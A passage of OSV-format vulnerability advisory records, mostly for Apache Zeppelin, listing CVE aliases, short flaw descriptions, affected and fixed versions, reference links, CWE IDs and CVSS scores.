"https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e85e83e9954f169bbb77b44baae5a33d8de878df557bb32b7f793661%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2017:3080" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2017/11/msg00009.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20171018-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180117-0002" }, { "type": "WEB", "url": "https://support.f5.com/csp/article/K53173544" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03812en_us" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbux03828en_us" }, { "type": "WEB", "url": "https://usn.ubuntu.com/3665-1" }, { "type": "WEB", "url": "https://web.archive.org/web/20171110171954/http://www.securityfocus.com/bid/100954" }, { "type": "WEB", "url": "https://web.archive.org/web/20201209024734/http://www.securitytracker.com/id/1039552" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-12617" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/42966" }, { "type": "WEB", "url": "https://www.exploit-db.com/exploits/43008" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3081" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3113" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2017:3114" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0268" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0269" }, { "type": 
"WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0270" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0271" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0275" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0465" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:0466" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1dd0a59c1295cc08ce4c9e7edae5ad2268acc9ba55adcefa0532e5ba@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/388a323769f1dff84c9ec905455aa73fbcb20338e3c7eb131457f708@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3d19773b4cf0377db62d1e9328bf9160bf1819f04f988315086931d7@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/845312a10aabbe2c499fca94003881d2c79fc993d85f34c1f5c77424@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/100954" }, { "type": "WEB", "url": "http://www.securitytracker.com/id/1039552" } ], "database_specific": { "cwe_ids": [ "CWE-434" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T21:20:08Z", "nvd_published_at": "2017-10-04T01:29:00Z", "severity": "HIGH" }, 
"severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-4qw8-pgpr-p9mq", "published": "2021-09-07T22:56:43Z", "modified": "2024-02-16T08:17:18.815800Z", "aliases": [ "CVE-2019-10095" ], "summary": "Bash command injection in Apache Zeppelin", "details": "bash command injection vulnerability in Apache Zeppelin allows an attacker to inject system commands into Spark interpreter settings. This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-4qw8-pgpr-p9mq/GHSA-4qw8-pgpr-p9mq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-10095" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd56389ba9cab30a6c976b9a4a6df0f85cbe8fba6a60a3cf6e3ba716b%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd56389ba9cab30a6c976b9a4a6df0f85cbe8fba6a60a3cf6e3ba716b@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdf06e8423833b3daadc30c56a2ff47c48920864d5199476daa897208@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/1" } ], "database_specific": { "cwe_ids": [ "CWE-77", "CWE-78" ], "github_reviewed": true, "github_reviewed_at": "2021-09-03T20:16:11Z", "nvd_published_at": "2021-09-02T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-87p2-cvhq-q4mv", "published": "2021-09-07T22:56:56Z", "modified": "2024-02-16T08:20:33.718960Z", "aliases": [ "CVE-2020-13929" ], "summary": "Authentication bypass in Apache Zeppelin", "details": "Authentication bypass vulnerability in Apache Zeppelin allows an attacker to bypass Zeppelin authentication mechanism to act as another user. 
This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-87p2-cvhq-q4mv/GHSA-87p2-cvhq-q4mv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-13929" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r768800925d6407a6a87ccae0ec98776b7bda50c0e3ed3d0130dad028@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r99529e175a7c1c9a26bd41a02802c8af7aa97319fe561874627eb999@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/2" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": 
true, "github_reviewed_at": "2021-09-03T20:16:12Z", "nvd_published_at": "2021-09-02T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9p8j-hrgf-jc2g", "published": "2022-12-20T21:30:19Z", "modified": "2023-11-08T04:10:58.147637Z", "aliases": [ "CVE-2022-46870" ], "summary": "Apache Zeppelin Cross-site Scripting vulnerability", "details": "An Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Zeppelin allows logged-in users to execute arbitrary javascript in other users' browsers. This issue affects Apache Zeppelin before 0.8.2. Users are recommended to upgrade to a supported version of Zeppelin.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.2" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9p8j-hrgf-jc2g/GHSA-9p8j-hrgf-jc2g.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46870" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/gb1wdnrm1095xw6qznpsycfrht4lwbwc" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2022-12-20T22:10:26Z", "nvd_published_at": "2022-12-16T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9x2h-hvg6-4r5p", "published": "2019-04-24T16:06:52Z", "modified": 
"2023-11-08T03:59:52.831613Z", "aliases": [ "CVE-2018-1317" ], "summary": "Improper Authentication in Apache Zeppelin", "details": "In Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-9x2h-hvg6-4r5p/GHSA-9x2h-hvg6-4r5p.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1317" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.8.0.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:07:02Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c538-924g-99q4", "published": "2019-04-24T16:06:59Z", "modified": "2023-11-08T03:58:53.247281Z", "aliases": [ "CVE-2017-12619" ], "summary": "Session Fixation in Apache Zeppelin", "details": "Apache Zeppelin prior to 0.7.3 was vulnerable to session fixation which allowed an attacker to hijack a valid user session. 
Issue was reported by \"stone lone\".", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.7.3" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-c538-924g-99q4/GHSA-c538-924g-99q4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-12619" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.7.3.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-384" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:04:01Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gm67-h5wr-w3cv", "published": "2023-07-06T19:24:05Z", "modified": "2024-02-16T08:14:41.034081Z", "aliases": [ "CVE-2021-28655" ], "summary": "Apache Zeppelin Improper Input Validation vulnerability", "details": "The improper Input Validation vulnerability in `Move folder to Trash` feature of Apache Zeppelin allows an attacker to delete the arbitrary files. 
This issue affects Apache Zeppelin Apache Zeppelin version 0.9.0 and prior versions.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.10.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-gm67-h5wr-w3cv/GHSA-gm67-h5wr-w3cv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28655" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/bxs056g3xlsofz0jb3wny9dw4llwptd2" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-07-06T21:44:43Z", "nvd_published_at": "2022-12-16T13:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mf7q-gw5f-q8jj", "published": "2021-09-07T22:55:56Z", "modified": "2024-02-16T08:08:39.299528Z", "aliases": [ "CVE-2021-27578" ], "summary": "Cross-site Scripting in Apache Zeppelin", "details": "Cross Site Scripting vulnerability in markdown interpreter of Apache Zeppelin allows an attacker to inject malicious scripts. 
This issue affects Apache Zeppelin Apache Zeppelin versions prior to 0.9.0.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.9.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3", "0.8.0", "0.8.1", "0.8.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/09/GHSA-mf7q-gw5f-q8jj/GHSA-mf7q-gw5f-q8jj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27578" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31012f2c8e39a5e12e14c1de030012cb8b51c037d953d73b291b7b50%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r31012f2c8e39a5e12e14c1de030012cb8b51c037d953d73b291b7b50@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d%40%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90590aa5ea788128ecc2e822e1e64d5200b4cb92b06707b38da4cb3d@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202311-04" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2021/09/02/3" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2021-09-03T20:16:10Z", 
"nvd_published_at": "2021-09-02T17:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-r2v5-5vcr-h3vq", "published": "2019-04-24T16:07:36Z", "modified": "2023-11-08T03:59:53.255873Z", "aliases": [ "CVE-2018-1328" ], "summary": "Cross-site Scripting in Apache Zeppelin", "details": "Apache Zeppelin prior to 0.8.0 had a stored XSS issue via Note permissions. Issue reported by \"Josna Joseph\".", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "0.8.0" } ] } ], "versions": [ "0.5.0-incubating", "0.6.0", "0.6.1", "0.6.2", "0.7.0", "0.7.1", "0.7.2", "0.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/04/GHSA-r2v5-5vcr-h3vq/GHSA-r2v5-5vcr-h3vq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1328" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff6b995a5a3ba8db4d6b14b4d9dd487e7bf2e3bdd5b375b64a25fd06@%3Cusers.zeppelin.apache.org%3E" }, { "type": "WEB", "url": "https://zeppelin.apache.org/releases/zeppelin-release-0.8.0.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2019/04/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2019-04-24T16:03:49Z", "nvd_published_at": "2019-04-23T15:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7pgf-ppxw-8624", "published": "2025-07-12T18:30:31Z", "modified": "2025-11-05T20:33:56.241584Z", "aliases": [ "CVE-2024-41169" ], "summary": "Apache Zeppelin exposes server resources to unauthenticated 
attackers", "details": "The attacker can use the raft server protocol in an unauthenticated way. The attacker can see the server's resources, including directories and files.\n\nThis issue affects Apache Zeppelin: from 0.10.1 up to 0.12.0.\n\nUsers are recommended to upgrade to version 0.12.0, which fixes the issue by removing the Cluster Interpreter.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.1" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.1", "0.11.0", "0.11.1", "0.11.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-7pgf-ppxw-8624/GHSA-7pgf-ppxw-8624.json" } }, { "package": { "name": "org.apache.zeppelin:zeppelin-server", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-server" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.10.1" }, { "fixed": "0.12.0" } ] } ], "versions": [ "0.10.1", "0.11.0", "0.11.1", "0.11.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-7pgf-ppxw-8624/GHSA-7pgf-ppxw-8624.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41169" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4841" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/ZEPPELIN-6101" }, { "type": "WEB", "url": "https://lists.apache.org/thread/moyym04993c8owh4h0qj98r43tbo8qdd" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/07/13/1" } ], "database_specific": { "cwe_ids": [ "CWE-664" ], "github_reviewed": true, "github_reviewed_at": "2025-07-14T20:31:20Z", "nvd_published_at": 
"2025-07-12T17:15:20Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-86jx-wr74-xr74", "published": "2024-04-09T18:30:22Z", "modified": "2024-08-21T19:06:54.380122Z", "aliases": [ "CVE-2024-31866" ], "summary": "Improper escaping in Apache Zeppelin", "details": "Improper Encoding or Escaping of Output vulnerability in Apache Zeppelin.\n\nThe attackers can execute shell scripts or malicious code by overriding configuration like ZEPPELIN_INTP_CLASSPATH_OVERRIDES.\nThis issue affects Apache Zeppelin: from 0.8.2 before 0.11.1.\n\nUsers are recommended to upgrade to version 0.11.1, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.zeppelin:zeppelin-interpreter", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.zeppelin/zeppelin-interpreter" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.8.2" }, { "fixed": "0.11.1" } ] } ], "versions": [ "0.10.0", "0.10.1", "0.11.0", "0.8.2", "0.9.0", "0.9.0-preview1", "0.9.0-preview2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/04/GHSA-86jx-wr74-xr74/GHSA-86jx-wr74-xr74.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-31866" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/pull/4715" }, { "type": "WEB", "url": "https://github.com/apache/zeppelin/commit/dd08a3966ef3b0b40f13d0291d7cac5ec3dd9f9c" }, { "type": "PACKAGE", "url": "https://github.com/apache/zeppelin" }, { "type": "WEB", "url": "https://lists.apache.org/thread/jpkbq3oktopt34x2n5wnhzc2r1410ddd" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/04/09/10" } ], "database_specific": { "cwe_ids": [ "CWE-116" ], "github_reviewed": true, "github_reviewed_at": "2024-05-24T20:11:32Z", "nvd_published_at": "2024-04-09T16:15:08Z", "severity": "CRITICAL" }, 
